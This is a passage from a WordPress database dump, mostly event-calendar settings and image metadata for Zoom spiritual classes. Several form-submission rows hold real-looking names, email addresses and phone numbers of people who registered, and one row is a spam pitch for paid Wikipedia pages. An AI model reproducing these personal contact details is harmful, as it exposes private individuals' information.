/>\r\n%%blog_name%%</p>\";}}'),(192329,269121,'passster_activate_global_protection',''),(192330,269121,'passster_activate_protection',''),(192331,269121,'passster_protection_type','password'),(192332,269121,'boldgrid_in_page_containers','1'),(192333,269121,'_dp_original','265240'),(192334,269121,'_edit_lock','1695907352:15'),(192335,269121,'passster_area_shortcode',''),(192336,269121,'_edit_last','15'),(192337,269121,'_wp_old_date','2023-01-14'),(192338,269121,'mec_cost_auto_calculate','0'),(192339,269121,'mec_style_per_event','global'),(192340,269121,'mec_trailer_url',''),(192341,269121,'mec_trailer_title',''),(192342,269121,'mec_start_datetime','2023-10-14 01:30 PM'),(192343,269121,'mec_end_datetime','2023-10-14 02:30 PM'),(192344,269121,'mec_sequence','1'),(192345,269121,'mec_event_gallery','a:0:{}'),(192346,269121,'mec_related_events','a:0:{}'),(192347,269121,'mec_banner','a:0:{}'),(192348,269121,'_thumbnail_id','269122'),(192349,269122,'_wp_attached_file','2023/09/TemplePool.webp'),(192350,269122,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:600;s:6:\"height\";i:338;s:4:\"file\";s:23:\"2023/09/TemplePool.webp\";s:8:\"filesize\";i:13332;s:5:\"sizes\";a:7:{s:6:\"medium\";a:5:{s:4:\"file\";s:23:\"TemplePool-348x196.webp\";s:5:\"width\";i:348;s:6:\"height\";i:196;s:9:\"mime-type\";s:10:\"image/webp\";s:8:\"filesize\";i:4758;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:23:\"TemplePool-150x150.webp\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/webp\";s:8:\"filesize\";i:2162;}s:9:\"thumblist\";a:5:{s:4:\"file\";s:23:\"TemplePool-300x300.webp\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/webp\";s:8:\"filesize\";i:4382;}s:12:\"thumbrelated\";a:5:{s:4:\"file\";s:23:\"TemplePool-500x338.webp\";s:5:\"width\";i:500;s:6:\"height\";i:338;s:9:\"mime-type\";s:10:\"image/webp\";s:8:\"filesize\";i:8124;}s:16:\"meccarouselthumb\";a:5:{s:4:\"file\";s:23:\"TemplePool-474x324.webp\";s:5:\"width\";i:474;s:6:\"height\";i:324;s:9:\"mime-type\";s:10:\"image/webp\";s:8:\"filesize\";i:7160;}s:10:\"gridsquare\";a:5:{s:4:\"file\";s:23:\"TemplePool-391x260.webp\";s:5:\"width\";i:391;s:6:\"height\";i:260;s:9:\"mime-type\";s:10:\"image/webp\";s:8:\"filesize\";i:5692;}s:8:\"tileview\";a:5:{s:4:\"file\";s:23:\"TemplePool-300x338.webp\";s:5:\"width\";i:300;s:6:\"height\";i:338;s:9:\"mime-type\";s:10:\"image/webp\";s:8:\"filesize\";i:4784;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(192351,269124,'_field_654','Nancy'),(192352,269124,'_field_652','Bigelow'),(192353,269124,'_field_653','nancybigelow@aol.com'),(192354,269124,'_field_651','(303) 550-6253'),(192355,269124,'_field_656','Letters of Light and Sound 2 - STARTS IN FEBRUARY -- 2nd Tuesday at 700 pm - Zoom'),(192356,269124,'_field_649',''),(192357,269124,'_form_id','61'),(192358,269124,'_seq_num','16'),(192427,269133,'_field_656','The Master 1 Discourses - STARTS IN NOVEMBER -- 2nd Monday at 700 pm - Zoom'),(192428,269133,'_field_649',''),(192429,269133,'_form_id','61'),(192430,269133,'_seq_num','24'),(192431,269135,'_field_654','Melony'),(192432,269135,'_field_652','Mont-Eton'),(192433,269135,'_field_653','mmonteton@hotmail.com'),(192434,269135,'_field_651','(720) 810-9396'),(192435,269135,'_field_656','Letters of Light and Sound 1 - STARTS IN NOVEMBER -- 1st Thursday at 645 pm - Zoom'),(192436,269135,'_field_649',''),(192437,269135,'_form_id','61'),(192438,269135,'_seq_num','25'),(192439,269136,'_field_133','Justin'),(192440,269136,'_field_134','Wilson'),(192441,269136,'_field_135','justin@wikiimediator.com'),(192442,269136,'_field_137','Get A Wikipedia Page For Yourself Or For Your Company.'),(192443,269136,'_field_138','Wikipedia is considered to be the World’s most significant tool for reference material. The Wiki links show up on the 1st page of Google 97% of the time. With a Page on one of the most revered reference tools, you are sure to get yourself or your business noticed. So if you\'re thinking of getting a Wikipedia Page created, it\'s the best time of the year.\n\nIf you are interested in getting more information just respond back to this email.\n\nThanks,\n\nJustin Wilson\nWiki Moderator\njustin@wikiimediator.com\n\nRespond with stop to optout.'),(192444,269136,'_form_id','13'),(192445,269136,'_seq_num','147'),(192446,269137,'_field_654','Laura'),(192447,269137,'_field_652','Grady'),(192448,269137,'_field_653','laurajgrady@gmail.com'),(192449,269137,'_field_651','(727) 271-7602'),(192450,269137,'_field_656','Letters of Light and Sound 1 - STARTS IN NOVEMBER -- 1st Thursday at 645 pm - Zoom'),(192451,269137,'_field_649',''),(192452,269137,'_form_id','61'),(192453,269137,'_seq_num','26'),(194869,269323,'mec_repeat_end',''),(194868,269323,'mec_repeat_interval','1'),(194867,269323,'mec_repeat_type',''),(194866,269323,'mec_repeat_status','0'),(192273,269121,'mec_read_more',''),(192272,269121,'mec_organizer_id','1'),(192271,269121,'mec_dont_show_map','0'),(192270,269121,'mec_location_id','166'),(192269,269121,'mec_color',''),(192268,269121,'protect_children',''),(192267,269120,'_seq_num','15'),(192266,269120,'_form_id','61'),(192265,269120,'_field_649',''),(192264,269120,'_field_656','The Secret Way - STARTS IN NOVEMBER -- 2nd Tuesday at 700-830 pm - Zoom'),(192263,269120,'_field_651','(303) 589-2364'),(192262,269120,'_field_653','stoney.merriman@gmail.com'),(177645,268029,'protect_children',''),(177646,268029,'mec_color',''),(177647,268029,'mec_location_id','170'),(177648,268029,'mec_dont_show_map','0'),(177649,268029,'mec_organizer_id','1'),(177650,268029,'mec_read_more',''),(177651,268029,'mec_more_info',''),(177652,268029,'mec_more_info_title',''),(177653,268029,'mec_more_info_target','_self'),(177654,268029,'mec_cost',''),(177655,268029,'mec_currency','a:0:{}'),(177656,268029,'mec_additional_organizer_ids','a:0:{}'),(177657,268029,'mec_additional_location_ids','a:0:{}'),(177658,268029,'mec_date','a:4:{s:5:\"start\";a:4:{s:4:\"date\";s:10:\"2023-03-08\";s:4:\"hour\";s:1:\"7\";s:7:\"minutes\";s:1:\"0\";s:4:\"ampm\";s:2:\"PM\";}s:3:\"end\";a:4:{s:4:\"date\";s:10:\"2023-03-08\";s:4:\"hour\";s:1:\"8\";s:7:\"minutes\";s:1:\"0\";s:4:\"ampm\";s:2:\"PM\";}s:7:\"comment\";s:0:\"\";s:6:\"repeat\";a:6:{s:4:\"type\";s:5:\"daily\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:0:\"\";s:3:\"end\";s:5:\"never\";s:11:\"end_at_date\";s:0:\"\";s:18:\"end_at_occurrences\";s:2:\"10\";}}'),(177659,268029,'mec_repeat','a:6:{s:4:\"type\";s:5:\"daily\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:0:\"\";s:3:\"end\";s:5:\"never\";s:11:\"end_at_date\";s:0:\"\";s:18:\"end_at_occurrences\";s:2:\"10\";}'),(177660,268029,'mec_certain_weekdays','a:0:{}'),(177661,268029,'mec_allday','0'),(177662,268029,'one_occurrence','0'),(177663,268029,'mec_hide_time','0'),(177664,268029,'mec_hide_end_time','0'),(177665,268029,'mec_comment',''),(177666,268029,'mec_timezone','global'),(177667,268029,'mec_countdown_method','global'),(177668,268029,'mec_public','1'),(177669,268029,'mec_start_date','2023-03-08'),(177670,268029,'mec_start_time_hour','7'),(177671,268029,'mec_start_time_minutes','0'),(177672,268029,'mec_start_time_ampm','PM'),(177673,268029,'mec_start_day_seconds','68400'),(177674,268029,'mec_end_date','2023-03-08'),(177675,268029,'mec_end_time_hour','8'),(177676,268029,'mec_end_time_minutes','0'),(177677,268029,'mec_end_time_ampm','PM'),(177678,268029,'mec_end_day_seconds','72000'),(177679,268029,'mec_repeat_status','0'),(177680,268029,'mec_repeat_type',''),(177681,268029,'mec_repeat_interval','1'),(177682,268029,'mec_repeat_end',''),(177683,268029,'mec_repeat_end_at_occurrences',''),(177684,268029,'mec_repeat_end_at_date',''),(177685,268029,'mec_advanced_days','a:0:{}'),(177686,268029,'mec_in_days',''),(177687,268029,'mec_not_in_days',''),(177688,268029,'mec_hourly_schedules','a:0:{}'),(177689,268029,'mec_booking','a:22:{s:24:\"bookings_limit_unlimited\";s:1:\"0\";s:14:\"bookings_limit\";s:0:\"\";s:28:\"roles_discount_administrator\";s:0:\"\";s:21:\"roles_discount_editor\";s:0:\"\";s:21:\"roles_discount_author\";s:0:\"\";s:26:\"roles_discount_contributor\";s:0:\"\";s:25:\"roles_discount_subscriber\";s:0:\"\";s:24:\"roles_discount_organizer\";s:0:\"\";s:25:\"roles_discount_uram_guest\";s:0:\"\";s:24:\"bookings_all_occurrences\";s:1:\"0\";s:33:\"bookings_all_occurrences_multiple\";s:1:\"0\";s:26:\"show_booking_form_interval\";s:0:\"\";s:35:\"stop_selling_after_first_occurrence\";s:1:\"0\";s:11:\"auto_verify\";s:6:\"global\";s:12:\"auto_confirm\";s:6:\"global\";s:35:\"last_few_tickets_percentage_inherit\";s:1:\"1\";s:27:\"last_few_tickets_percentage\";s:3:\"100\";s:21:\"thankyou_page_inherit\";s:1:\"1\";s:21:\"booking_thankyou_page\";s:0:\"\";s:26:\"booking_thankyou_page_time\";s:4:\"2000\";s:29:\"bookings_user_limit_unlimited\";s:1:\"1\";s:19:\"bookings_user_limit\";s:0:\"\";}'),(177690,268029,'mec_tickets','a:0:{}'),(177691,268029,'mec_fees_global_inheritance','1'),(177692,268029,'mec_fees','a:0:{}'),(177693,268029,'mec_ticket_variations_global_inheritance','1'),(177694,268029,'mec_ticket_variations','a:0:{}'),(177695,268029,'mec_reg_fields_global_inheritance','1'),(177696,268029,'mec_reg_fields','a:0:{}'),(177697,268029,'mec_bfixed_fields','a:0:{}'),(177698,268029,'mec_op','a:0:{}'),(177699,268029,'mec_fields','a:0:{}'),(177700,268029,'mec_event_status','EventScheduled'),(177701,268029,'mec_moved_online_link',''),(177702,268029,'mec_cancelled_reason',''),(177703,268029,'mec_display_cancellation_reason_in_single_page',''),(177704,268029,'boldgrid_hide_page_title','0'),(177705,268029,'mec_notifications','a:3:{s:20:\"booking_notification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:0:\"\";s:7:\"content\";s:0:\"\";}s:18:\"email_verification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:27:\"Please verify your booking.\";s:7:\"content\";s:153:\"<p>Hi %%name%%,</p>\r\n<p>Please verify your booking by clicking on following link:</p>\r\n<p>%%verification_link%%</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}s:18:\"admin_notification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:26:\"A new booking is received.\";s:7:\"content\";s:195:\"<p>Dear Admin,</p>\r\n<p>A new booking is received. Please check and confirm it as soon as possible.</p>\r\n<p>%%admin_link%%</p>\r\n<p>%%attendees_full_info%%</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}}'),(177706,268029,'passster_activate_global_protection',NULL),(177707,268029,'passster_activate_protection',NULL),(177708,268029,'passster_protection_type','password'),(177709,268029,'boldgrid_in_page_containers','1'),(177711,268029,'_dp_original','267696'),(177712,268029,'_edit_lock','1676659223:2'),(177713,268029,'_edit_last','2'),(177714,268030,'_wp_attached_file','2023/02/man-sea-sitting-1.jpg'),(177715,268030,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:759;s:6:\"height\";i:448;s:4:\"file\";s:29:\"2023/02/man-sea-sitting-1.jpg\";s:8:\"filesize\";i:110016;s:5:\"sizes\";a:6:{s:6:\"medium\";a:5:{s:4:\"file\";s:29:\"man-sea-sitting-1-300x177.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:177;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:19743;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:29:\"man-sea-sitting-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:8786;}s:9:\"thumblist\";a:5:{s:4:\"file\";s:29:\"man-sea-sitting-1-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:28878;}s:16:\"meccarouselthumb\";a:5:{s:4:\"file\";s:29:\"man-sea-sitting-1-474x324.jpg\";s:5:\"width\";i:474;s:6:\"height\";i:324;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:48302;}s:10:\"gridsquare\";a:5:{s:4:\"file\";s:29:\"man-sea-sitting-1-391x260.jpg\";s:5:\"width\";i:391;s:6:\"height\";i:260;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:34170;}s:8:\"tileview\";a:5:{s:4:\"file\";s:29:\"man-sea-sitting-1-300x400.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:34636;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(177716,268029,'_thumbnail_id','268030'),(177717,268030,'original-file','2023/02/man-sea-sitting-1-updraft-pre-smush-original.jpg'),(177718,268030,'smush-complete','1'),(177719,268030,'smush-info','The file was compressed from 107.44 KB to 103.01 KB saving 4.12 percent using WP-Optimize'),(177720,268030,'smush-stats','a:5:{s:12:\"smushed-with\";s:11:\"re-smush-it\";s:13:\"original-size\";i:110016;s:12:\"smushed-size\";i:105479;s:15:\"savings-percent\";d:4.12;s:10:\"sizes-info\";a:7:{s:4:\"full\";a:2:{s:8:\"original\";i:110016;s:10:\"compressed\";i:105479;}s:6:\"medium\";a:2:{s:8:\"original\";i:19743;s:10:\"compressed\";i:19335;}s:9:\"thumbnail\";a:2:{s:8:\"original\";i:8786;s:10:\"compressed\";i:8720;}s:9:\"thumblist\";a:2:{s:8:\"original\";i:28878;s:10:\"compressed\";i:28315;}s:16:\"meccarouselthumb\";a:2:{s:8:\"original\";i:48302;s:10:\"compressed\";i:47196;}s:10:\"gridsquare\";a:2:{s:8:\"original\";i:34170;s:10:\"compressed\";i:33326;}s:8:\"tileview\";a:2:{s:8:\"original\";i:34636;s:10:\"compressed\";i:34065;}}}'),(177721,268031,'protect_children',''),(177722,268031,'mec_color',''),(177723,268031,'mec_location_id','165'),(177724,268031,'mec_dont_show_map','0'),(177725,268031,'mec_organizer_id','1'),(177726,268031,'mec_read_more',''),(177727,268031,'mec_more_info',''),(177728,268031,'mec_more_info_title',''),(177729,268031,'mec_more_info_target','_self'),(177730,268031,'mec_cost',''),(177731,268031,'mec_currency','a:0:{}'),(177732,268031,'mec_additional_organizer_ids','a:0:{}'),(177733,268031,'mec_additional_location_ids','a:0:{}'),(177734,268031,'mec_date','a:4:{s:5:\"start\";a:4:{s:4:\"date\";s:10:\"2023-03-09\";s:4:\"hour\";s:1:\"7\";s:7:\"minutes\";s:1:\"0\";s:4:\"ampm\";s:2:\"PM\";}s:3:\"end\";a:4:{s:4:\"date\";s:10:\"2023-03-09\";s:4:\"hour\";s:1:\"8\";s:7:\"minutes\";s:1:\"0\";s:4:\"ampm\";s:2:\"PM\";}s:7:\"comment\";s:0:\"\";s:6:\"repeat\";a:6:{s:4:\"type\";s:5:\"daily\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:0:\"\";s:3:\"end\";s:5:\"never\";s:11:\"end_at_date\";s:0:\"\";s:18:\"end_at_occurrences\";s:2:\"10\";}}'),(177735,268031,'mec_repeat','a:6:{s:4:\"type\";s:5:\"daily\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:0:\"\";s:3:\"end\";s:5:\"never\";s:11:\"end_at_date\";s:0:\"\";s:18:\"end_at_occurrences\";s:2:\"10\";}'),(177736,268031,'mec_certain_weekdays','a:0:{}'),(177737,268031,'mec_allday','0'),(177738,268031,'one_occurrence','0'),(177739,268031,'mec_hide_time','0'),(177740,268031,'mec_hide_end_time','0'),(177741,268031,'mec_comment',''),(177742,268031,'mec_timezone','global'),(177743,268031,'mec_countdown_method','global'),(177744,268031,'mec_public','1'),(177745,268031,'mec_start_date','2023-03-09'),(177746,268031,'mec_start_time_hour','7'),(177747,268031,'mec_start_time_minutes','0'),(177748,268031,'mec_start_time_ampm','PM'),(177749,268031,'mec_start_day_seconds','68400'),(177750,268031,'mec_end_date','2023-03-09'),(177751,268031,'mec_end_time_hour','8'),(177752,268031,'mec_end_time_minutes','0'),(177753,268031,'mec_end_time_ampm','PM'),(177754,268031,'mec_end_day_seconds','72000'),(177755,268031,'mec_repeat_status','0'),(177756,268031,'mec_repeat_type',''),(177757,268031,'mec_repeat_interval','1'),(177758,268031,'mec_repeat_end',''),(177759,268031,'mec_repeat_end_at_occurrences',''),(177760,268031,'mec_repeat_end_at_date',''),(177761,268031,'mec_advanced_days','a:0:{}'),(177762,268031,'mec_in_days',''),(177763,268031,'mec_not_in_days',''),(177764,268031,'mec_hourly_schedules','a:0:{}'),(177765,268031,'mec_booking','a:22:{s:24:\"bookings_limit_unlimited\";s:1:\"0\";s:14:\"bookings_limit\";s:0:\"\";s:28:\"roles_discount_administrator\";s:0:\"\";s:21:\"roles_discount_editor\";s:0:\"\";s:21:\"roles_discount_author\";s:0:\"\";s:26:\"roles_discount_contributor\";s:0:\"\";s:25:\"roles_discount_subscriber\";s:0:\"\";s:24:\"roles_discount_organizer\";s:0:\"\";s:25:\"roles_discount_uram_guest\";s:0:\"\";s:24:\"bookings_all_occurrences\";s:1:\"0\";s:33:\"bookings_all_occurrences_multiple\";s:1:\"0\";s:26:\"show_booking_form_interval\";s:0:\"\";s:35:\"stop_selling_after_first_occurrence\";s:1:\"0\";s:11:\"auto_verify\";s:6:\"global\";s:12:\"auto_confirm\";s:6:\"global\";s:35:\"last_few_tickets_percentage_inherit\";s:1:\"1\";s:27:\"last_few_tickets_percentage\";s:3:\"100\";s:21:\"thankyou_page_inherit\";s:1:\"1\";s:21:\"booking_thankyou_page\";s:0:\"\";s:26:\"booking_thankyou_page_time\";s:4:\"2000\";s:29:\"bookings_user_limit_unlimited\";s:1:\"1\";s:19:\"bookings_user_limit\";s:0:\"\";}'),(177766,268031,'mec_tickets','a:0:{}'),(177767,268031,'mec_fees_global_inheritance','1'),(177768,268031,'mec_fees','a:0:{}'),(177769,268031,'mec_ticket_variations_global_inheritance','1'),(177770,268031,'mec_ticket_variations','a:0:{}'),(177771,268031,'mec_reg_fields_global_inheritance','1'),(177772,268031,'mec_reg_fields','a:0:{}'),(177773,268031,'mec_bfixed_fields','a:0:{}'),(177774,268031,'mec_op','a:0:{}'),(177775,268031,'mec_fields','a:0:{}'),(177776,268031,'mec_event_status','EventScheduled'),(177777,268031,'mec_moved_online_link',''),(177778,268031,'mec_cancelled_reason',''),(177779,268031,'mec_display_cancellation_reason_in_single_page',''),(177780,268031,'boldgrid_hide_page_title','0'),(177781,268031,'mec_notifications','a:3:{s:20:\"booking_notification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:0:\"\";s:7:\"content\";s:0:\"\";}s:18:\"email_verification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:27:\"Please verify your booking.\";s:7:\"content\";s:153:\"<p>Hi %%name%%,</p>\r\n<p>Please verify your booking by clicking on following link:</p>\r\n<p>%%verification_link%%</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}s:18:\"admin_notification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:26:\"A new booking is received.\";s:7:\"content\";s:195:\"<p>Dear Admin,</p>\r\n<p>A new booking is received. Please check and confirm it as soon as possible.</p>\r\n<p>%%admin_link%%</p>\r\n<p>%%attendees_full_info%%</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}}'),(177782,268031,'passster_activate_global_protection',NULL),(177783,268031,'passster_activate_protection',NULL),(177784,268031,'passster_protection_type','password'),(177785,268031,'boldgrid_in_page_containers','1'),(177787,268031,'_dp_original','267696'),(177788,268031,'_edit_lock','1676659778:2'),(177789,268031,'_edit_last','2'),(177790,268031,'_thumbnail_id','266734'),(177792,268038,'mec_color',''),(177793,268038,'mec_location_id','166'),(177794,268038,'mec_dont_show_map','0'),(177795,268038,'mec_organizer_id','1'),(177796,268038,'mec_read_more',''),(177797,268038,'mec_more_info',''),(177798,268038,'mec_more_info_title',''),(177799,268038,'mec_more_info_target','_self'),(177800,268038,'mec_cost',''),(177801,268038,'mec_currency','a:0:{}'),(177802,268038,'mec_additional_organizer_ids','a:0:{}'),(177803,268038,'mec_additional_location_ids','a:0:{}'),(177804,268038,'mec_date','a:4:{s:5:\"start\";a:4:{s:4:\"date\";s:10:\"2023-02-25\";s:4:\"hour\";s:2:\"10\";s:7:\"minutes\";s:2:\"30\";s:4:\"ampm\";s:2:\"AM\";}s:3:\"end\";a:4:{s:4:\"date\";s:10:\"2023-02-25\";s:4:\"hour\";s:2:\"11\";s:7:\"minutes\";s:2:\"30\";s:4:\"ampm\";s:2:\"AM\";}s:7:\"comment\";s:0:\"\";s:6:\"repeat\";a:6:{s:4:\"type\";s:5:\"daily\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:0:\"\";s:3:\"end\";s:5:\"never\";s:11:\"end_at_date\";s:0:\"\";s:18:\"end_at_occurrences\";s:2:\"10\";}}'),(177805,268038,'mec_repeat','a:6:{s:4:\"type\";s:5:\"daily\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:0:\"\";s:3:\"end\";s:5:\"never\";s:11:\"end_at_date\";s:0:\"\";s:18:\"end_at_occurrences\";s:2:\"10\";}'),(177806,268038,'mec_certain_weekdays','a:0:{}'),(177807,268038,'mec_allday','0'),(177808,268038,'one_occurrence','0'),(177809,268038,'mec_hide_time','0'),(177810,268038,'mec_hide_end_time','0'),(177811,268038,'mec_comment',''),(177812,268038,'mec_timezone','global'),(177813,268038,'mec_countdown_method','global'),(177814,268038,'mec_public','1'),(177815,268038,'mec_start_date','2023-02-25'),(177816,268038,'mec_start_time_hour','10'),(177817,268038,'mec_start_time_minutes','30'),(177818,268038,'mec_start_time_ampm','AM'),(177819,268038,'mec_start_day_seconds','37800'),(177820,268038,'mec_end_date','2023-02-25'),(177821,268038,'mec_end_time_hour','11'),(177822,268038,'mec_end_time_minutes','30'),(177823,268038,'mec_end_time_ampm','AM'),(177824,268038,'mec_end_day_seconds','41400'),(177825,268038,'mec_repeat_status','0'),(177826,268038,'mec_repeat_type',''),(177827,268038,'mec_repeat_interval','1'),(177828,268038,'mec_repeat_end',''),(177829,268038,'mec_repeat_end_at_occurrences',''),(177830,268038,'mec_repeat_end_at_date',''),(177831,268038,'mec_advanced_days','a:0:{}'),(177832,268038,'mec_in_days',''),(177833,268038,'mec_not_in_days',''),(177834,268038,'mec_hourly_schedules','a:0:{}'),(177835,268038,'mec_booking','a:22:{s:24:\"bookings_limit_unlimited\";s:1:\"0\";s:14:\"bookings_limit\";s:0:\"\";s:28:\"roles_discount_administrator\";s:0:\"\";s:21:\"roles_discount_editor\";s:0:\"\";s:21:\"roles_discount_author\";s:0:\"\";s:26:\"roles_discount_contributor\";s:0:\"\";s:25:\"roles_discount_subscriber\";s:0:\"\";s:24:\"roles_discount_organizer\";s:0:\"\";s:25:\"roles_discount_uram_guest\";s:0:\"\";s:24:\"bookings_all_occurrences\";s:1:\"0\";s:33:\"bookings_all_occurrences_multiple\";s:1:\"0\";s:26:\"show_booking_form_interval\";s:0:\"\";s:35:\"stop_selling_after_first_occurrence\";s:1:\"0\";s:11:\"auto_verify\";s:6:\"global\";s:12:\"auto_confirm\";s:6:\"global\";s:35:\"last_few_tickets_percentage_inherit\";s:1:\"1\";s:27:\"last_few_tickets_percentage\";s:3:\"100\";s:21:\"thankyou_page_inherit\";s:1:\"1\";s:21:\"booking_thankyou_page\";s:0:\"\";s:26:\"booking_thankyou_page_time\";s:4:\"2000\";s:29:\"bookings_user_limit_unlimited\";s:1:\"1\";s:19:\"bookings_user_limit\";s:0:\"\";}'),(177836,268038,'mec_tickets','a:0:{}'),(177837,268038,'mec_fees_global_inheritance','1'),(177838,268038,'mec_fees','a:0:{}'),(177839,268038,'mec_ticket_variations_global_inheritance','1'),(177840,268038,'mec_ticket_variations','a:0:{}'),(177841,268038,'mec_reg_fields_global_inheritance','1'),(177842,268038,'mec_reg_fields','a:0:{}'),(177843,268038,'mec_bfixed_fields','a:0:{}'),(177844,268038,'mec_op','a:0:{}'),(177845,268038,'mec_fields','a:0:{}'),(177846,268038,'mec_event_status','EventScheduled'),(177847,268038,'mec_moved_online_link',''),(177848,268038,'mec_cancelled_reason',''),(177849,268038,'mec_display_cancellation_reason_in_single_page',''),(177850,268038,'boldgrid_hide_page_title','0'),(177851,268038,'mec_notifications','a:3:{s:20:\"booking_notification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:0:\"\";s:7:\"content\";s:0:\"\";}s:18:\"email_verification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:27:\"Please verify your booking.\";s:7:\"content\";s:153:\"<p>Hi %%name%%,</p>\r\n<p>Please verify your booking by clicking on following link:</p>\r\n<p>%%verification_link%%</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}s:18:\"admin_notification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:26:\"A new booking is received.\";s:7:\"content\";s:195:\"<p>Dear Admin,</p>\r\n<p>A new booking is received. Please check and confirm it as soon as possible.</p>\r\n<p>%%admin_link%%</p>\r\n<p>%%attendees_full_info%%</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}}'),(177852,268038,'passster_activate_global_protection',NULL),(177853,268038,'passster_activate_protection',NULL),(177854,268038,'passster_protection_type','password'),(177855,268038,'boldgrid_in_page_containers','1'),(177857,268038,'_dp_original','267696'),(177858,268038,'_edit_lock','1676908935:15'),(177859,268038,'_edit_last','15'),(177860,268038,'_thumbnail_id','266821'),(177861,268038,'passster_area_shortcode',''),(177862,45842,'passster_area_shortcode',''),(177863,7162,'passster_area_shortcode',''),(177964,268113,'mec_transaction_id','VRP48575'),(177864,268041,'_wp_attached_file','2023/02/Seminars.jpg'),(177865,268041,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:229;s:6:\"height\";i:153;s:4:\"file\";s:20:\"2023/02/Seminars.jpg\";s:8:\"filesize\";i:65243;s:5:\"sizes\";a:1:{s:9:\"thumbnail\";a:5:{s:4:\"file\";s:20:\"Seminars-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:55452;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:3:\"2.8\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:10:\"NIKON D610\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1397788788\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:3:\"170\";s:3:\"iso\";s:4:\"1600\";s:13:\"shutter_speed\";s:4:\"0.02\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(177866,268042,'_wp_attached_file','2023/02/ECK-Light-and-Sound-Service.jpg'),(177867,268042,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:229;s:6:\"height\";i:153;s:4:\"file\";s:39:\"2023/02/ECK-Light-and-Sound-Service.jpg\";s:8:\"filesize\";i:15487;s:5:\"sizes\";a:1:{s:9:\"thumbnail\";a:5:{s:4:\"file\";s:39:\"ECK-Light-and-Sound-Service-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:7834;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(177868,268043,'_wp_attached_file','2023/02/Easy-Way.jpg'),(177869,268043,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:229;s:6:\"height\";i:153;s:4:\"file\";s:20:\"2023/02/Easy-Way.jpg\";s:8:\"filesize\";i:37186;s:5:\"sizes\";a:1:{s:9:\"thumbnail\";a:5:{s:4:\"file\";s:20:\"Easy-